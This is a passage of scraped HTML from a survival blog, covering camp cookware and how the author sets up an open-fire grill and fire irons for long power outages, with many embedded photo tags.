https://sensiblesurvival.files.wordpress.com/2018/06/10.jpg?w=768&amp;h=574 768w" sizes="(max-width: 497px) 100vw, 497px" /></a></p> <p>I also have an enamelware lid that fits over my 10” skillet.<a href="https://sensiblesurvival.org/2018/06/11/outdoor-cookware/11-15/" rel="attachment wp-att-3319"><img data-attachment-id="3319" data-permalink="https://sensiblesurvival.org/2018/06/11/outdoor-cookware/11-15/" data-orig-file="https://sensiblesurvival.files.wordpress.com/2018/06/11.jpg" data-orig-size="2592,1936" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;3.5&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;DSC-T77&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1528302098&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;6.18&quot;,&quot;iso&quot;:&quot;125&quot;,&quot;shutter_speed&quot;:&quot;0.025&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="11" data-image-description="" data-medium-file="https://sensiblesurvival.files.wordpress.com/2018/06/11.jpg?w=300" data-large-file="https://sensiblesurvival.files.wordpress.com/2018/06/11.jpg?w=497" class="aligncenter size-large wp-image-3319" src="https://sensiblesurvival.files.wordpress.com/2018/06/11.jpg?w=497&#038;h=371" alt="" width="497" height="371" srcset="https://sensiblesurvival.files.wordpress.com/2018/06/11.jpg?w=497&amp;h=371 497w, https://sensiblesurvival.files.wordpress.com/2018/06/11.jpg?w=994&amp;h=742 994w, https://sensiblesurvival.files.wordpress.com/2018/06/11.jpg?w=150&amp;h=112 150w, https://sensiblesurvival.files.wordpress.com/2018/06/11.jpg?w=300&amp;h=224 300w, https://sensiblesurvival.files.wordpress.com/2018/06/11.jpg?w=768&amp;h=574 768w" sizes="(max-width: 497px) 100vw, 497px" /></a></p> <p>Kitchen Utensils</p> <p>You can get as complicated as you want on utensils.  I keep it pretty simple. The main rule is “long handles.”  You want to be able to reach out over that fire without singing the hair off of your hand.  I use a big butcher knife and a small paring knife.  Also pictured is an old-time can opener.<a href="https://sensiblesurvival.org/2018/06/11/outdoor-cookware/12-14/" rel="attachment wp-att-3320"><img data-attachment-id="3320" data-permalink="https://sensiblesurvival.org/2018/06/11/outdoor-cookware/12-14/" data-orig-file="https://sensiblesurvival.files.wordpress.com/2018/06/12.jpg" data-orig-size="2592,1936" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;3.5&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;DSC-T77&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1528302556&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;6.18&quot;,&quot;iso&quot;:&quot;100&quot;,&quot;shutter_speed&quot;:&quot;0.02&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="12" data-image-description="" data-medium-file="https://sensiblesurvival.files.wordpress.com/2018/06/12.jpg?w=300" data-large-file="https://sensiblesurvival.files.wordpress.com/2018/06/12.jpg?w=497" class="aligncenter size-large wp-image-3320" src="https://sensiblesurvival.files.wordpress.com/2018/06/12.jpg?w=497&#038;h=371" alt="" width="497" height="371" srcset="https://sensiblesurvival.files.wordpress.com/2018/06/12.jpg?w=497&amp;h=371 497w, https://sensiblesurvival.files.wordpress.com/2018/06/12.jpg?w=994&amp;h=742 994w, https://sensiblesurvival.files.wordpress.com/2018/06/12.jpg?w=150&amp;h=112 150w, https://sensiblesurvival.files.wordpress.com/2018/06/12.jpg?w=300&amp;h=224 300w, https://sensiblesurvival.files.wordpress.com/2018/06/12.jpg?w=768&amp;h=574 768w" sizes="(max-width: 497px) 100vw, 497px" /></a></p> <p>A pair of meat tongs and a long handle fork are also handy; especially if you are cooking straight on the grill.<a href="https://sensiblesurvival.org/2018/06/11/outdoor-cookware/13-15/" rel="attachment wp-att-3321"><img data-attachment-id="3321" data-permalink="https://sensiblesurvival.org/2018/06/11/outdoor-cookware/13-15/" data-orig-file="https://sensiblesurvival.files.wordpress.com/2018/06/13.jpg" data-orig-size="2592,1944" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;3.5&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;DSC-T77&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1528302584&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;6.18&quot;,&quot;iso&quot;:&quot;160&quot;,&quot;shutter_speed&quot;:&quot;0.025&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="13" data-image-description="" data-medium-file="https://sensiblesurvival.files.wordpress.com/2018/06/13.jpg?w=300" data-large-file="https://sensiblesurvival.files.wordpress.com/2018/06/13.jpg?w=497" class="aligncenter size-large wp-image-3321" src="https://sensiblesurvival.files.wordpress.com/2018/06/13.jpg?w=497&#038;h=373" alt="" width="497" height="373" srcset="https://sensiblesurvival.files.wordpress.com/2018/06/13.jpg?w=497&amp;h=373 497w, https://sensiblesurvival.files.wordpress.com/2018/06/13.jpg?w=994&amp;h=746 994w, https://sensiblesurvival.files.wordpress.com/2018/06/13.jpg?w=150&amp;h=113 150w, https://sensiblesurvival.files.wordpress.com/2018/06/13.jpg?w=300&amp;h=225 300w, https://sensiblesurvival.files.wordpress.com/2018/06/13.jpg?w=768&amp;h=576 768w" sizes="(max-width: 497px) 100vw, 497px" /></a></p> <p>You’ll need a spatula, a ladle, and a spoon to cook with, and that weird looking thing on the right is an absolute necessity if you’re using a Dutch oven.  It’s called a lid lifter.<a href="https://sensiblesurvival.org/2018/06/11/outdoor-cookware/14-14/" rel="attachment wp-att-3322"><img data-attachment-id="3322" data-permalink="https://sensiblesurvival.org/2018/06/11/outdoor-cookware/14-14/" data-orig-file="https://sensiblesurvival.files.wordpress.com/2018/06/14.jpg" data-orig-size="2592,1944" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;3.5&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;DSC-T77&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1528302651&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;6.18&quot;,&quot;iso&quot;:&quot;125&quot;,&quot;shutter_speed&quot;:&quot;0.025&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="14" data-image-description="" data-medium-file="https://sensiblesurvival.files.wordpress.com/2018/06/14.jpg?w=300" data-large-file="https://sensiblesurvival.files.wordpress.com/2018/06/14.jpg?w=497" class="aligncenter size-large wp-image-3322" src="https://sensiblesurvival.files.wordpress.com/2018/06/14.jpg?w=497&#038;h=373" alt="" width="497" height="373" srcset="https://sensiblesurvival.files.wordpress.com/2018/06/14.jpg?w=497&amp;h=373 497w, https://sensiblesurvival.files.wordpress.com/2018/06/14.jpg?w=994&amp;h=746 994w, https://sensiblesurvival.files.wordpress.com/2018/06/14.jpg?w=150&amp;h=113 150w, https://sensiblesurvival.files.wordpress.com/2018/06/14.jpg?w=300&amp;h=225 300w, https://sensiblesurvival.files.wordpress.com/2018/06/14.jpg?w=768&amp;h=576 768w" sizes="(max-width: 497px) 100vw, 497px" /></a></p> <p><a href="https://sensiblesurvival.org/2018/06/11/outdoor-cookware/15-13/" rel="attachment wp-att-3323"><img data-attachment-id="3323" data-permalink="https://sensiblesurvival.org/2018/06/11/outdoor-cookware/15-13/" data-orig-file="https://sensiblesurvival.files.wordpress.com/2018/06/15.jpg" data-orig-size="2592,1936" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;3.5&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;DSC-T77&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1528302736&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;6.18&quot;,&quot;iso&quot;:&quot;125&quot;,&quot;shutter_speed&quot;:&quot;0.025&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="15" data-image-description="" data-medium-file="https://sensiblesurvival.files.wordpress.com/2018/06/15.jpg?w=300" data-large-file="https://sensiblesurvival.files.wordpress.com/2018/06/15.jpg?w=497" class="aligncenter size-large wp-image-3323" src="https://sensiblesurvival.files.wordpress.com/2018/06/15.jpg?w=497&#038;h=371" alt="" width="497" height="371" srcset="https://sensiblesurvival.files.wordpress.com/2018/06/15.jpg?w=497&amp;h=371 497w, https://sensiblesurvival.files.wordpress.com/2018/06/15.jpg?w=994&amp;h=742 994w, https://sensiblesurvival.files.wordpress.com/2018/06/15.jpg?w=150&amp;h=112 150w, https://sensiblesurvival.files.wordpress.com/2018/06/15.jpg?w=300&amp;h=224 300w, https://sensiblesurvival.files.wordpress.com/2018/06/15.jpg?w=768&amp;h=574 768w" sizes="(max-width: 497px) 100vw, 497px" /></a></p> <p>The last item on the list is a blow-pipe.  This is used to direct air at your fire to help build the flame.  It concentrates the stream of air much better than bending over and blowing through your lips.<a href="https://sensiblesurvival.org/2018/06/11/outdoor-cookware/16-11/" rel="attachment wp-att-3324"><img data-attachment-id="3324" data-permalink="https://sensiblesurvival.org/2018/06/11/outdoor-cookware/16-11/" data-orig-file="https://sensiblesurvival.files.wordpress.com/2018/06/16.jpg" data-orig-size="2592,1936" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;3.5&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;DSC-T77&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1528302815&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;6.18&quot;,&quot;iso&quot;:&quot;160&quot;,&quot;shutter_speed&quot;:&quot;0.025&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="16" data-image-description="" data-medium-file="https://sensiblesurvival.files.wordpress.com/2018/06/16.jpg?w=300" data-large-file="https://sensiblesurvival.files.wordpress.com/2018/06/16.jpg?w=497" class="aligncenter size-large wp-image-3324" src="https://sensiblesurvival.files.wordpress.com/2018/06/16.jpg?w=497&#038;h=371" alt="" width="497" height="371" srcset="https://sensiblesurvival.files.wordpress.com/2018/06/16.jpg?w=497&amp;h=371 497w, https://sensiblesurvival.files.wordpress.com/2018/06/16.jpg?w=994&amp;h=742 994w, https://sensiblesurvival.files.wordpress.com/2018/06/16.jpg?w=150&amp;h=112 150w, https://sensiblesurvival.files.wordpress.com/2018/06/16.jpg?w=300&amp;h=224 300w, https://sensiblesurvival.files.wordpress.com/2018/06/16.jpg?w=768&amp;h=574 768w" sizes="(max-width: 497px) 100vw, 497px" /></a></p> <p>Well, that’s it for cookware.  As you can see I didn’t exactly drive over to William’s Sonoma and buy my stuff.  It’s mostly hand me downs, garage sales, and thrift stores; but it works, and it has turned out some good camp meals over the years.</p> <p>&nbsp;</p> </div><!--end entry--> <div class="post-footer"> <div class="comments"> <a href="https://sensiblesurvival.org/2018/06/11/outdoor-cookware/#comments">3 Comments</a> </div><!-- .comments --> </div><!--end post footer--> </div><!--end post--> <div id="post-3289" class="post-3289 post type-post status-publish format-standard hentry category-food-preparation-and-recipes tag-camp-cooking tag-camp-kitchen tag-fire-irons tag-outdoor-kitchen"> <div class="post-header"> <div class="date"><a href="https://sensiblesurvival.org/2018/04/09/outdoor-cooking-equipment/">April 9, 2018</a></div> <h2><a href="https://sensiblesurvival.org/2018/04/09/outdoor-cooking-equipment/" rel="bookmark" title="Permanent Link to Outdoor Cooking Equipment">Outdoor Cooking Equipment</a></h2> <div class="author"> </div> </div><!--end post header--> <div class="entry clear"> <p>In any long-term grid down situation it will eventually become necessary to cook on an open fire.  This is, of course, assuming that you don’t have an old time wood-burning cook stove.  I personally don’t have a wood burning cook stove.  I have a propane cook stove, and I have enough propane to operate said stove for about a year.  This makes it easy to deal with run-of-the-mill power outages, but for a super long term emergency situation the propane will run out.  In order to keep cooking in such a situation I have put together a pretty good outdoor cook set.  This is not the kind of equipment that you can throw in a bug-out bag.  It is heavy, it is durable, and it will last for generations; but it is not very portable unless you have a vehicle.  I’d like, in this post, to tell you a little bit about my outdoor cooking equipment; so without further delay, let’s get started.</p> <p>The Grill</p> <p>The most basic component of your outdoor cooking set-up is the grill.  Grills come in many sizes, shapes, prices, and configurations.  There are many places that you can purchase a good cooking grill.   You can get a grill at a sporting goods store or a big-box store like Wal-Mart.  I actually bought my 12” X 18” grill at a home building supply store for about $10 US.  I think it was a replacement grill for an outdoor barbecue.<a href="https://sensiblesurvival.org/2018/04/09/outdoor-cooking-equipment/003-16/" rel="attachment wp-att-3292"><img data-attachment-id="3292" data-permalink="https://sensiblesurvival.org/2018/04/09/outdoor-cooking-equipment/003-16/" data-orig-file="https://sensiblesurvival.files.wordpress.com/2018/04/003.jpg" data-orig-size="2592,1936" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;4.5&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;DSC-T77&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1523021259&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;6.18&quot;,&quot;iso&quot;:&quot;100&quot;,&quot;shutter_speed&quot;:&quot;0.005&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="003" data-image-description="" data-medium-file="https://sensiblesurvival.files.wordpress.com/2018/04/003.jpg?w=300" data-large-file="https://sensiblesurvival.files.wordpress.com/2018/04/003.jpg?w=497" class="aligncenter size-large wp-image-3292" src="https://sensiblesurvival.files.wordpress.com/2018/04/003.jpg?w=497&#038;h=371" alt="" width="497" height="371" srcset="https://sensiblesurvival.files.wordpress.com/2018/04/003.jpg?w=497&amp;h=371 497w, https://sensiblesurvival.files.wordpress.com/2018/04/003.jpg?w=994&amp;h=742 994w, https://sensiblesurvival.files.wordpress.com/2018/04/003.jpg?w=150&amp;h=112 150w, https://sensiblesurvival.files.wordpress.com/2018/04/003.jpg?w=300&amp;h=224 300w, https://sensiblesurvival.files.wordpress.com/2018/04/003.jpg?w=768&amp;h=574 768w" sizes="(max-width: 497px) 100vw, 497px" /></a></p> <p>To support the grill I made four legs by bending some 3/8 inch bar stock as illustrated in the photo below.<a href="https://sensiblesurvival.org/2018/04/09/outdoor-cooking-equipment/004-16/" rel="attachment wp-att-3293"><img data-attachment-id="3293" data-permalink="https://sensiblesurvival.org/2018/04/09/outdoor-cooking-equipment/004-16/" data-orig-file="https://sensiblesurvival.files.wordpress.com/2018/04/004.jpg" data-orig-size="2592,1944" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;4.5&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;DSC-T77&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1523021344&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;6.18&quot;,&quot;iso&quot;:&quot;100&quot;,&quot;shutter_speed&quot;:&quot;0.004&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="004" data-image-description="" data-medium-file="https://sensiblesurvival.files.wordpress.com/2018/04/004.jpg?w=300" data-large-file="https://sensiblesurvival.files.wordpress.com/2018/04/004.jpg?w=497" class="aligncenter size-large wp-image-3293" src="https://sensiblesurvival.files.wordpress.com/2018/04/004.jpg?w=497&#038;h=373" alt="" width="497" height="373" srcset="https://sensiblesurvival.files.wordpress.com/2018/04/004.jpg?w=497&amp;h=373 497w, https://sensiblesurvival.files.wordpress.com/2018/04/004.jpg?w=994&amp;h=746 994w, https://sensiblesurvival.files.wordpress.com/2018/04/004.jpg?w=150&amp;h=113 150w, https://sensiblesurvival.files.wordpress.com/2018/04/004.jpg?w=300&amp;h=225 300w, https://sensiblesurvival.files.wordpress.com/2018/04/004.jpg?w=768&amp;h=576 768w" sizes="(max-width: 497px) 100vw, 497px" /></a></p> <p>To set up the grill requires a small camp shovel and a hand axe or hammer.  I use a hand axe because it is more multi-purpose than a hammer.<a href="https://sensiblesurvival.org/2018/04/09/outdoor-cooking-equipment/001-12/" rel="attachment wp-att-3290"><img data-attachment-id="3290" data-permalink="https://sensiblesurvival.org/2018/04/09/outdoor-cooking-equipment/001-12/" data-orig-file="https://sensiblesurvival.files.wordpress.com/2018/04/001.jpg" data-orig-size="2592,1936" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;3.5&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;DSC-T77&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1523021149&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;6.18&quot;,&quot;iso&quot;:&quot;100&quot;,&quot;shutter_speed&quot;:&quot;0.0125&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="001" data-image-description="" data-medium-file="https://sensiblesurvival.files.wordpress.com/2018/04/001.jpg?w=300" data-large-file="https://sensiblesurvival.files.wordpress.com/2018/04/001.jpg?w=497" class="aligncenter size-large wp-image-3290" src="https://sensiblesurvival.files.wordpress.com/2018/04/001.jpg?w=497&#038;h=371" alt="" width="497" height="371" srcset="https://sensiblesurvival.files.wordpress.com/2018/04/001.jpg?w=497&amp;h=371 497w, https://sensiblesurvival.files.wordpress.com/2018/04/001.jpg?w=994&amp;h=742 994w, https://sensiblesurvival.files.wordpress.com/2018/04/001.jpg?w=150&amp;h=112 150w, https://sensiblesurvival.files.wordpress.com/2018/04/001.jpg?w=300&amp;h=224 300w, https://sensiblesurvival.files.wordpress.com/2018/04/001.jpg?w=768&amp;h=574 768w" sizes="(max-width: 497px) 100vw, 497px" /></a></p> <p>Start by digging a fire pit that is about four or five inches deep and slightly smaller than your grill.  One end of the fire pit should slope up to ground level so that you can feed firewood down under the grill.<a href="https://sensiblesurvival.org/2018/04/09/outdoor-cooking-equipment/002-15/" rel="attachment wp-att-3291"><img data-attachment-id="3291" data-permalink="https://sensiblesurvival.org/2018/04/09/outdoor-cooking-equipment/002-15/" data-orig-file="https://sensiblesurvival.files.wordpress.com/2018/04/002.jpg" data-orig-size="2592,1936" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;3.5&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;DSC-T77&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1523021196&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;6.18&quot;,&quot;iso&quot;:&quot;100&quot;,&quot;shutter_speed&quot;:&quot;0.016666666666667&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="002" data-image-description="" data-medium-file="https://sensiblesurvival.files.wordpress.com/2018/04/002.jpg?w=300" data-large-file="https://sensiblesurvival.files.wordpress.com/2018/04/002.jpg?w=497" class="aligncenter size-large wp-image-3291" src="https://sensiblesurvival.files.wordpress.com/2018/04/002.jpg?w=497&#038;h=371" alt="" width="497" height="371" srcset="https://sensiblesurvival.files.wordpress.com/2018/04/002.jpg?w=497&amp;h=371 497w, https://sensiblesurvival.files.wordpress.com/2018/04/002.jpg?w=994&amp;h=742 994w, https://sensiblesurvival.files.wordpress.com/2018/04/002.jpg?w=150&amp;h=112 150w, https://sensiblesurvival.files.wordpress.com/2018/04/002.jpg?w=300&amp;h=224 300w, https://sensiblesurvival.files.wordpress.com/2018/04/002.jpg?w=768&amp;h=574 768w" sizes="(max-width: 497px) 100vw, 497px" /></a></p> <p>Lay your grill down over the fire pit so that you can determine where to hammer in the legs, and use your hand axe to start the legs into the ground.  Set your grill on the legs and tap each leg in so the grill is as close to level as you can eye-ball.  You should end up with about eight or ten inches of space between the bottom of the fire pit and the surface of your grill.  This will leave enough room to get a good fire going under the grill.<a href="https://sensiblesurvival.org/2018/04/09/outdoor-cooking-equipment/005-15/" rel="attachment wp-att-3294"><img data-attachment-id="3294" data-permalink="https://sensiblesurvival.org/2018/04/09/outdoor-cooking-equipment/005-15/" data-orig-file="https://sensiblesurvival.files.wordpress.com/2018/04/005.jpg" data-orig-size="2592,1936" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;3.5&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;DSC-T77&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1523021665&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;6.18&quot;,&quot;iso&quot;:&quot;100&quot;,&quot;shutter_speed&quot;:&quot;0.008&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="005" data-image-description="" data-medium-file="https://sensiblesurvival.files.wordpress.com/2018/04/005.jpg?w=300" data-large-file="https://sensiblesurvival.files.wordpress.com/2018/04/005.jpg?w=497" class="aligncenter size-large wp-image-3294" src="https://sensiblesurvival.files.wordpress.com/2018/04/005.jpg?w=497&#038;h=371" alt="" width="497" height="371" srcset="https://sensiblesurvival.files.wordpress.com/2018/04/005.jpg?w=497&amp;h=371 497w, https://sensiblesurvival.files.wordpress.com/2018/04/005.jpg?w=994&amp;h=742 994w, https://sensiblesurvival.files.wordpress.com/2018/04/005.jpg?w=150&amp;h=112 150w, https://sensiblesurvival.files.wordpress.com/2018/04/005.jpg?w=300&amp;h=224 300w, https://sensiblesurvival.files.wordpress.com/2018/04/005.jpg?w=768&amp;h=574 768w" sizes="(max-width: 497px) 100vw, 497px" /></a></p> <p>To fine tune the leveling process, set a pan of water on top of the grill and tap the legs down until the water is level in the pan.  You may not think it’s important to level your grill, but it’s really annoying to try and cook something in a frying pan and have all the grease run over to one side of the pan.<a href="https://sensiblesurvival.org/2018/04/09/outdoor-cooking-equipment/006-15/" rel="attachment wp-att-3295"><img data-attachment-id="3295" data-permalink="https://sensiblesurvival.org/2018/04/09/outdoor-cooking-equipment/006-15/" data-orig-file="https://sensiblesurvival.files.wordpress.com/2018/04/006.jpg" data-orig-size="2592,1936" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;3.5&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;DSC-T77&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1523021925&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;6.18&quot;,&quot;iso&quot;:&quot;100&quot;,&quot;shutter_speed&quot;:&quot;0.00625&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="006" data-image-description="" data-medium-file="https://sensiblesurvival.files.wordpress.com/2018/04/006.jpg?w=300" data-large-file="https://sensiblesurvival.files.wordpress.com/2018/04/006.jpg?w=497" class="aligncenter size-large wp-image-3295" src="https://sensiblesurvival.files.wordpress.com/2018/04/006.jpg?w=497&#038;h=371" alt="" width="497" height="371" srcset="https://sensiblesurvival.files.wordpress.com/2018/04/006.jpg?w=497&amp;h=371 497w, https://sensiblesurvival.files.wordpress.com/2018/04/006.jpg?w=994&amp;h=742 994w, https://sensiblesurvival.files.wordpress.com/2018/04/006.jpg?w=150&amp;h=112 150w, https://sensiblesurvival.files.wordpress.com/2018/04/006.jpg?w=300&amp;h=224 300w, https://sensiblesurvival.files.wordpress.com/2018/04/006.jpg?w=768&amp;h=574 768w" sizes="(max-width: 497px) 100vw, 497px" /></a></p> <p>Fire Irons</p> <p>&nbsp;</p> <p>A set of fire irons is a metal framework that is used to suspend cooking pots or a coffee pot over your fire.  <a href="https://sensiblesurvival.org/2018/04/09/outdoor-cooking-equipment/007-15/" rel="attachment wp-att-3296"><img data-attachment-id="3296" data-permalink="https://sensiblesurvival.org/2018/04/09/outdoor-cooking-equipment/007-15/" data-orig-file="https://sensiblesurvival.files.wordpress.com/2018/04/007.jpg" data-orig-size="2592,1936" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;3.5&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;DSC-T77&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1523185500&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;6.18&quot;,&quot;iso&quot;:&quot;125&quot;,&quot;shutter_speed&quot;:&quot;0.025&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="007" data-image-description="" data-medium-file="https://sensiblesurvival.files.wordpress.com/2018/04/007.jpg?w=300" data-large-file="https://sensiblesurvival.files.wordpress.com/2018/04/007.jpg?w=497" class="aligncenter size-large wp-image-3296" src="https://sensiblesurvival.files.wordpress.com/2018/04/007.jpg?w=497&#038;h=371" alt="" width="497" height="371" srcset="https://sensiblesurvival.files.wordpress.com/2018/04/007.jpg?w=497&amp;h=371 497w, https://sensiblesurvival.files.wordpress.com/2018/04/007.jpg?w=994&amp;h=742 994w, https://sensiblesurvival.files.wordpress.com/2018/04/007.jpg?w=150&amp;h=112 150w, https://sensiblesurvival.files.wordpress.com/2018/04/007.jpg?w=300&amp;h=224 300w, https://sensiblesurvival.files.wordpress.com/2018/04/007.jpg?w=768&amp;h=574 768w" sizes="(max-width: 497px) 100vw, 497px" /></a></p> <p><a href="https://sensiblesurvival.org/2018/04/09/outdoor-cooking-equipment/008-15/" rel="attachment wp-att-3297"><img data-attachment-id="3297" data-permalink="https://sensiblesurvival.org/2018/04/09/outdoor-cooking-equipment/008-15/" data-orig-file="https://sensiblesurvival.files.wordpress.com/2018/04/008.jpg" data-orig-size="2592,1944" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;3.5&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;DSC-T77&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1523185512&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;6.18&quot;,&quot;iso&quot;:&quot;125&quot;,&quot;shutter_speed&quot;:&quot;0.025&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="008" data-image-description="" data-medium-file="https://sensiblesurvival.files.wordpress.com/2018/04/008.jpg?w=300" data-large-file="https://sensiblesurvival.files.wordpress.com/2018/04/008.jpg?w=497" class="aligncenter size-large wp-image-3297" src="https://sensiblesurvival.files.wordpress.com/2018/04/008.jpg?w=497&#038;h=373" alt="" width="497" height="373" srcset="https://sensiblesurvival.files.wordpress.com/2018/04/008.jpg?w=497&amp;h=373 497w, https://sensiblesurvival.files.wordpress.com/2018/04/008.jpg?w=994&amp;h=746 994w, https://sensiblesurvival.files.wordpress.com/2018/04/008.jpg?w=150&amp;h=113 150w, https://sensiblesurvival.files.wordpress.com/2018/04/008.jpg?w=300&amp;h=225 300w, https://sensiblesurvival.files.wordpress.com/2018/04/008.jpg?w=768&amp;h=576 768w" sizes="(max-width: 497px) 100vw, 497px" /></a></p> <p>Fire irons are not as easy to find as a grill.  I’ve never seen fire irons in a regular retail store.  You can probably find fire irons on-line if you want to go that route.  Any good size mountain man rendezvous or other re-enactor’s event will probably have a blacksmith or two that sells fire irons.  I had my set made by a blacksmith friend.  Blacksmithing is no longer a common profession, but if you search on- line you might find one near you.  Of course any welder can cut, heat, and bend up some 5/8” bar stock and make you a set.</p> <p>&nbsp;</p> <p>One part of the fire iron set that is pretty hard for an amateur to make is the crane. <a href="https://sensiblesurvival.org/2018/04/09/outdoor-cooking-equipment/009-15/" rel="attachment wp-att-3298"><img data-attachment-id="3298" data-permalink="https://sensiblesurvival.org/2018/04/09/outdoor-cooking-equipment/009-15/" data-orig-file="https://sensiblesurvival.files.wordpress.com/2018/04/009.jpg" data-orig-size="2592,1936" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;3.5&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;DSC-T77&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1523185591&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;6.18&quot;,&quot;iso&quot;:&quot;100&quot;,&quot;shutter_speed&quot;:&quot;0.01&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="009" data-image-description="" data-medium-file="https://sensiblesurvival.files.wordpress.com/2018/04/009.jpg?w=300" data-large-file="https://sensiblesurvival.files.wordpress.com/2018/04/009.jpg?w=497" class="aligncenter size-large wp-image-3298" src="https://sensiblesurvival.files.wordpress.com/2018/04/009.jpg?w=497&#038;h=371" alt="" width="497" height="371" srcset="https://sensiblesurvival.files.wordpress.com/2018/04/009.jpg?w=497&amp;h=371 497w, https://sensiblesurvival.files.wordpress.com/2018/04/009.jpg?w=994&amp;h=742 994w, https://sensiblesurvival.files.wordpress.com/2018/04/009.jpg?w=150&amp;h=112 150w, https://sensiblesurvival.files.wordpress.com/2018/04/009.jpg?w=300&amp;h=224 300w, https://sensiblesurvival.files.wordpress.com/2018/04/009.jpg?w=768&amp;h=574 768w" sizes="(max-width: 497px) 100vw, 497px" /></a></p> <p><a href="https://sensiblesurvival.org/2018/04/09/outdoor-cooking-equipment/010-15/" rel="attachment 